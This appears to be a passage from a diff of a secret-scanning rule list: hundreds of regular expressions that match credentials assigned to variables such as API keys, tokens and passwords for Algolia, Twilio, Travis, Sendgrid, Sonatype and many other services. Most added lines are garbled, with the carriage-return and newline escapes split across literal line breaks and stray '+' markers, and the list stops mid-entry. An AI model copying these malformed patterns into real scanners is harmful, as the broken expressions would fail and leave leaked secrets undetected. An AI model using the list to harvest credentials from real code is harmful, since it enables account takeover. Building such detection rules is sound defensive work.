"(?i)[\"']?alicloud[_-]?secret[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?alicloud[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?alias[_-]?pass[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?algolia[_-]?search[_-]?key[_-]?1[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?algolia[_-]?search[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?algolia[_-]?search[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?algolia[_-]?api[_-]?key[_-]?search[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?algolia[_-]?api[_-]?key[_-]?mcm[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?algolia[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?algolia[_-]?admin[_-]?key[_-]?mcm[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?algolia[_-]?admin[_-]?key[_-]?2[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?algolia[_-]?admin[_-]?key[_-]?1[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?yt[_-]?server[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?yt[_-]?partner[_-]?refresh[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?yt[_-]?partner[_-]?client[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?yt[_-]?client[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?yt[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?yt[_-]?account[_-]?refresh[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?yt[_-]?account[_-]?client[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?yangshun[_-]?gh[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?yangshun[_-]?gh[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?www[_-]?googleapis[_-]?com[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?wpt[_-]?ssh[_-]?private[_-]?key[_-]?base64[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?wpt[_-]?ssh[_-]?connect[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?wpt[_-]?report[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?wpt[_-]?prepare[_-]?dir[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?wpt[_-]?db[_-]?user[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?wpt[_-]?db[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?wporg[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?wpjm[_-]?phpunit[_-]?google[_-]?geocode[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?wordpress[_-]?db[_-]?user[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?wordpress[_-]?db[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?wincert[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?widget[_-]?test[_-]?server[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?widget[_-]?fb[_-]?password[_-]?3[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?widget[_-]?fb[_-]?password[_-]?2[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?widget[_-]?fb[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?widget[_-]?basic[_-]?password[_-]?5[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?widget[_-]?basic[_-]?password[_-]?4[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?widget[_-]?basic[_-]?password[_-]?3[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?widget[_-]?basic[_-]?password[_-]?2[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?widget[_-]?basic[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?watson[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?watson[_-]?device[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?watson[_-]?conversation[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?wakatime[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?vscetoken[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?visual[_-]?recognition[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?virustotal[_-]?apikey[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?vip[_-]?github[_-]?deploy[_-]?key[_-]?pass[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?vip[_-]?github[_-]?deploy[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?vip[_-]?github[_-]?build[_-]?repo[_-]?deploy[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?v[_-]?sfdc[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?v[_-]?sfdc[_-]?client[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?usertravis[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?user[_-]?assets[_-]?secret[_-]?access[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?user[_-]?assets[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?use[_-]?ssh[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?us[_-]?east[_-]?1[_-]?elb[_-]?amazonaws[_-]?com[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?urban[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?urban[_-]?master[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?urban[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?unity[_-]?serial[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?unity[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?twitteroauthaccesstoken[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?twitteroauthaccesssecret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?twitter[_-]?consumer[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?twitter[_-]?consumer[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?twine[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?twilio[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?twilio[_-]?sid[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?twilio[_-]?configuration[_-]?sid[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?twilio[_-]?chat[_-]?account[_-]?api[_-]?service[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?twilio[_-]?api[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?twilio[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?trex[_-]?okta[_-]?client[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?trex[_-]?client[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?travis[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?travis[_-]?secure[_-]?env[_-]?vars[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?travis[_-]?pull[_-]?request[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?travis[_-]?gh[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?travis[_-]?e2e[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?travis[_-]?com[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?travis[_-]?branch[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?travis[_-]?api[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?travis[_-]?access[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?token[_-]?core[_-]?java[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?thera[_-]?oss[_-]?access[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?tester[_-]?keys[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?test[_-]?test[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?test[_-]?github[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?tesco[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?svn[_-]?pass[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?surge[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?surge[_-]?login[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?stripe[_-]?public[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?stripe[_-]?private[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?strip[_-]?secret[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?strip[_-]?publishable[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?stormpath[_-]?api[_-]?key[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?stormpath[_-]?api[_-]?key[_-]?id[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?starship[_-]?auth[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?starship[_-]?account[_-]?sid[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?star[_-]?test[_-]?secret[_-]?access[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?star[_-]?test[_-]?location[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?star[_-]?test[_-]?bucket[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?star[_-]?test[_-]?aws[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?staging[_-]?base[_-]?url[_-]?runscope[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ssmtp[_-]?config[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?sshpass[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?srcclr[_-]?api[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?square[_-]?reader[_-]?sdk[_-]?repository[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?sqssecretkey[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?sqsaccesskey[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?spring[_-]?mail[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?spotify[_-]?api[_-]?client[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?spotify[_-]?api[_-]?access[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?spaces[_-]?secret[_-]?access[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?spaces[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?soundcloud[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?soundcloud[_-]?client[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?sonatypepassword[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?sonatype[_-]?token[_-]?user[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?sonatype[_-]?token[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?sonatype[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?sonatype[_-]?pass[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?sonatype[_-]?nexus[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?sonatype[_-]?gpg[_-]?passphrase[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?sonatype[_-]?gpg[_-]?key[_-]?name[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?sonar[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?sonar[_-]?project[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?sonar[_-]?organization[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?socrata[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?socrata[_-]?app[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?snyk[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?snyk[_-]?api[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?snoowrap[_-]?refresh[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?snoowrap[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?snoowrap[_-]?client[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?slate[_-]?user[_-]?email[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?slash[_-]?developer[_-]?space[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?slash[_-]?developer[_-]?space[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?signing[_-]?key[_-]?sid[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?signing[_-]?key[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?signing[_-]?key[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?signing[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?setsecretkey[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?setdstsecretkey[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?setdstaccesskey[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ses[_-]?secret[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ses[_-]?access[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?service[_-]?account[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?sentry[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?sentry[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?sentry[_-]?endpoint[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?sentry[_-]?default[_-]?org[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?sentry[_-]?auth[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?sendwithus[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?sendgrid[_-]?username[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?sendgrid[_-]?user[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?sendgrid[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?sendgrid[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?sendgrid[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?sendgrid[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?selion[_-]?selenium[_-]?host[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?selion[_-]?log[_-]?level[_-]?dev[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?segment[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?secretkey[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?secretaccesskey[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?secret[_-]?key[_-]?base[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?secret[_-]?9[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?secret[_-]?8[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?secret[_-]?7[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?secret[_-]?6[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?secret[_-]?5[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?secret[_-]?4[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?secret[_-]?3[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?secret[_-]?2[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?secret[_-]?11[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?secret[_-]?10[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?secret[_-]?1[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?secret[_-]?0[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?sdr[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?scrutinizer[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?sauce[_-]?access[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?sandbox[_-]?aws[_-]?secret[_-]?access[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?sandbox[_-]?aws[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?sandbox[_-]?access[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?salesforce[_-]?bulk[_-]?test[_-]?security[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?salesforce[_-]?bulk[_-]?test[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?sacloud[_-]?api[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?sacloud[_-]?access[_-]?token[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?sacloud[_-]?access[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?s3[_-]?user[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - 